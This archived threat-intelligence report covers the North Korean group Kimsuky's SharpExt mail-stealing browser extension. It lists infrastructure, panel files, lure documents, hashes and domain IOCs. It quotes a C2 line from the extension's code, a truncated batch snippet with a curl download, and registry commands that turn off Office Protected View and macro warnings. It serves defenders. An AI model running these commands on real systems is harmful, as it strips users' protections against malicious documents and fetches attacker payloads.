{
	"id": "cd73f1dd-043e-4ac3-8141-d86bcab20ad9",
	"created_at": "2026-04-06T02:11:16.501574Z",
	"updated_at": "2026-04-10T03:37:40.730388Z",
	"deleted_at": null,
	"sha1_hash": "1138d174099e24eea4d84a44a1586e953c1a3cdd",
	"title": "Pivoting on a SharpExt to profile Kimsuky panels for great good",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 542015,
	"plain_text": "Pivoting on a SharpExt to profile Kimsuky panels for great good\r\nBy Jason Reaves\r\nPublished: 2023-02-20 · Archived: 2026-04-06 01:30:57 UTC\r\nAug 9, 2022\r\nBy: Jason Reaves and Joshua Platt\r\nVolexity recently released a blog detailing a browser extension malware dubbed SharpExt[1] being leveraged by Kimsuky[2]. The goal of SharpExt, as detailed in the blog, is ultimately to steal emails and attachments from the victims. This blog is purely meant to expand on existing work with items we recovered through our pivoting and research.\r\nPivoting on their research along with some research from Huntress[3], we also found a connection to earlier campaigns in a report from 2021[4]. One site in particular was interesting:\r\nhttp://nuclearpolicy101[.]org/wp-admin/includes/0421/d[.]php?na=vbtmp\r\nhttps://medium.com/walmartglobaltech/pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9\r\nThe site has been utilized by Kimsuky for over a year and earlier this year was updated to deliver the browser extension code:\r\n[Figure: browser extension code delivered by nuclearpolicy101]\r\nThe bg.js file from nuclearpolicy101 also listed the same C2 as the Volexity blog:\r\nvar g_url = \"https://gonamod.com/sanghyon/index.php\",g_devtabs=[];\r\nA second IOC listed by Volexity, siekis[.]com, is a little more interesting. This site is not a compromised site but something actor controlled. The server hosts multiple websites along with connections to some of the campaigns detailed by Huntress. However, the VPS folders have been renamed. Current domains set up on this server:\r\ndusieme.com/\r\neislesf.live/\r\nielsems.com/\r\nilijw.live/\r\nsiekis.com/\r\nsoekfes.live/\r\nsqiesbob.com/\r\nSome of the domains that are leveraged for the campaigns can be seen in the aforementioned blogs[1,3]. The structure of these is normally a mix of the following files:\r\ncow.php\r\nd.php\r\nr.php\r\nsc.php\r\nhis.php\r\nindex.php\r\nupload.php\r\nupload_dotm.php\r\ndoc.php\r\nmacro.php\r\nresp.txt\r\nres/\r\nThe other files in the folder are related to the various PowerShell scripts, batch files, DLLs and browser extensions that are delivered.\r\nSome of the other domains are leveraged for C2 activity from the browser extension, along with any files the browser extension needs. These folders usually consist of the following:\r\nindex.php\r\nmanage.php\r\ncode.js\r\nlist.txt\r\nblack_list.txt\r\natt/\r\ndomain/\r\nmail/\r\nThrough our research, we were able to map out some victimology based on traffic data:\r\n[Figure: victimology heat map based on traffic data]\r\nThe hot spots largely confirm other reporting that the intended targets are the United States, Europe and South Korea[1].\r\nOlder Campaigns\r\nDuring our research, we also recovered information from older campaigns that did not utilize a browser extension. Surprisingly, the actor(s) appeared to leverage UltraViewer in some engagements:\r\n[Figure: UltraViewer usage recovered from an older campaign]\r\nJudging by documents we recovered, the group continues to be very active:\r\nESDU Tokuchi.doc  ad869e6765212fb1c724936a4e9b6a35  Created: 2022-04-29\r\nInterview memo_Gareth.doc  e6f6dedc573c7be462e74ff1289aab34  Created: 2022-05-08\r\nDonga-A_VAN.doc  a7b6491683766b01b7b9c76652a3993f  Created: 2022-03-07\r\nTBS TV_Qs.doc  77258de4bfa37fe26d5b4d6348fd31a6  Created: 2022-04-09\r\nNEWSIS_interview.doc  b3103f9543b31d00d9fecf3943cb6b6d  Created: 2022-01-26\r\nChina.doc  46bc9c7ed36f6f8d2c3f968cb758df1f  Created: 2022-03-28\r\nInterview memo_Ralph.doc  9c2434cbfa7e6ff49c67bfc74a6bf7bc  Created: 2022-04-24\r\nUS-ROK Tech Cooperation Goodman.doc  df7cd79c5e9cc5471f1772f75b646467  Created: 2022-04-25\r\nCM College_interview.doc  36e6f04777e1bbdc719a3adc7d842586  Created: 2022-04-27\r\nInterview memo_patrick.doc  42805ec97173c4a074580d473aeecbe4  Created: 2022-04-21\r\nUpholding the RBO in the INdo-Pac.doc  b57e9474698823fcb300ad29b2ddd657  Created: 2022-04-10\r\nSimilar to past campaigns, they continue to use HWP (Hangul Word Processor) documents:\r\nThe Burden of the Unintended.hwp\r\nCreated 2022-02-24\r\nUpon execution, the HWP documents execute a batch file similar to the one below (the recovered text is truncated):\r\ntaskkill /im OneDriveStandaloneUpdater.exe /f\r\ntaskkill /im OneDriveStandaloneUpdater.exe /f\r\ncurl -o \"%a\r\nIOCs\r\nNetwork:\r\nsouibi.com\r\ndusieme.com\r\neislesf.live\r\nielsems.com\r\nilijw.live\r\nsiekis.com\r\nsoekfes.live\r\nsqiesbob.com\r\ngonamod.com\r\nbeastmodser.club\r\nnuclearpolicy101.org (compromised)\r\nfrebough.com\r\nhodbeast.com\r\nnewspeers.com\r\nnewspeers.us\r\nvisitnewsworld.xyz\r\ndocsaccess.xyz\r\nresepmo.com\r\nretmodul.com\r\nworldinfocontact.club\r\nwrldinfocontact.club\r\nsecmets.live\r\npreheds.shop\r\nCommands (as recovered; each line is truncated at the right edge):\r\nreg add HKEY_CURRENT_USER\\Software\\RegisteredApplications /v AppXr1bysyqf6kpaq1aje5sbadka8dgx3g4g /t\r\nreg add \"HKCU\\Software\\Microsoft\\Office\\13.0\\Word\\Security\\ProtectedView\" /v DisableInternetFilesInP\r\nreg add \"HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView\" /v DisableInternetFilesInP\r\nreg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Word\\Security\" /v VBAWarnings /t REG_DWORD\r\nreg add \"HKCU\\Software\\Microsoft\\Office\\13.0\\Word\\Security\\ProtectedView\" /v DisableAttachementsInPV\r\nreg add \"HKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\" /v DisableInternetFilesInP\r\nreg add \"HKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\" /v DisableUnsafeLocationsI\r\nreg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Security\" /v VBAWarnings /t REG_DWORD\r\nreg add \"HKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\" /v DisableInternetFilesInP\r\nreg add \"HKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\" /v DisableAttachementsInPV\r\nreg add \"HKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\" /v DisableInternetFilesInP\r\nreg add \"HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView\" /v DisableAttachementsInPV\r\nreg add \"HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView\" /v DisableUnsafeLocationsI\r\nreg add \"HKCU\\Software\\Microsoft\\Office\\13.0\\Word\\Security\\ProtectedView\" /v DisableUnsafeLocationsI\r\nreg add \"HKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\" /v DisableAttachementsInPV\r\nreg add \"HKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\" /v DisableUnsafeLocationsI\r\nreg add \"HKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\" /v DisableAttachementsInPV\r\nreg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Security\" /v VBAWarnings /t REG_DWORD\r\nreg add \"HKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\" /v DisableUnsafeLocationsI\r\nreg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Word\\Security\" /v VBAWarnings /t REG_DWORD\r\nreg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\" /v VBAWarnings /t REG_DWORD\r\nRecovered Documents:\r\n42805ec97173c4a074580d473aeecbe4\r\nb57e9474698823fcb300ad29b2ddd657\r\ned424b7dbe6ce5dfdd051fca7d216ea4\r\n43d95c74d3ed1e4ee8f07c286a95258b\r\n36e6f04777e1bbdc719a3adc7d842586\r\nbd69b7fe688f121f33f2cb752d3d9aee\r\nd902d7688d75dddca219a3eac5bbab10\r\n31bafa8e3dfee43e305fd1bb1174ebea\r\nbba46893cb8b8130aeca98955751d8df\r\nf8ddac12d26c0cda72f6b37d405525fc\r\na7a6a36e6dbe3816209786f4e04a2936\r\n7306d5afdd54164650a17c66f354dea4\r\n1907f12e443edbae04d85a7981f50e46\r\n7c387100acfd1129ef59753f469950de\r\n98955bcdce0d45d2dcd328c4c762b598\r\n8db970e3670c8dcdea1ac346df6a5409\r\nc23157dc5f321a461b7c6e84a83ed462\r\nf4e98ff7a041291311f4a2d548fb1204\r\nda9b66ad97b93e5b11cbd9b4e6f255b9\r\ne023261bf272a96a13a1765fc579257f\r\nb3103f9543b31d00d9fecf3943cb6b6d\r\nee1b273c729a946d494826fa0104a51f\r\n7cb6eca45f351670e48e3b54f252ac4d\r\n1de67d829884ea1f4b51c94104b47374\r\n80e5fc84e30c208fb4d0e71046c26b11\r\n77258de4bfa37fe26d5b4d6348fd31a6\r\na7b6491683766b01b7b9c76652a3993f\r\naa8b64f8b22126b1199d345ee5088003\r\n46bc9c7ed36f6f8d2c3f968cb758df1f\r\n2def674177ad929ffe91545fee474132\r\ne6f6dedc573c7be462e74ff1289aab34\r\ne1e6dc332827b958e93b3548f647d70c\r\nad869e6765212fb1c724936a4e9b6a35\r\n3e8846e6e4eb963077aa3e0f5134b072\r\n9c2434cbfa7e6ff49c67bfc74a6bf7bc\r\ndf7cd79c5e9cc5471f1772f75b646467\r\nedf19a5f034d6251d652b3ad353c4fe9\r\n3c9c5e555e6b4b8cfa9046a08f3cf92b\r\nReferences\r\n1: https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/\r\n2: https://malpedia.caad.fkie.fraunhofer.de/actor/kimsuky\r\n3: https://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood\r\n4: http://www.hackdig.com/07/hack-420942.htm\r\nSource: https://medium.com/walmartglobaltech/pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/walmartglobaltech/pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9"
	],
	"report_names": [
		"pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9"
	],
	"threat_actors": [
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775441476,
	"ts_updated_at": 1775792260,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1138d174099e24eea4d84a44a1586e953c1a3cdd.pdf",
		"text": "https://archive.orkl.eu/1138d174099e24eea4d84a44a1586e953c1a3cdd.txt",
		"img": "https://archive.orkl.eu/1138d174099e24eea4d84a44a1586e953c1a3cdd.jpg"
	}
}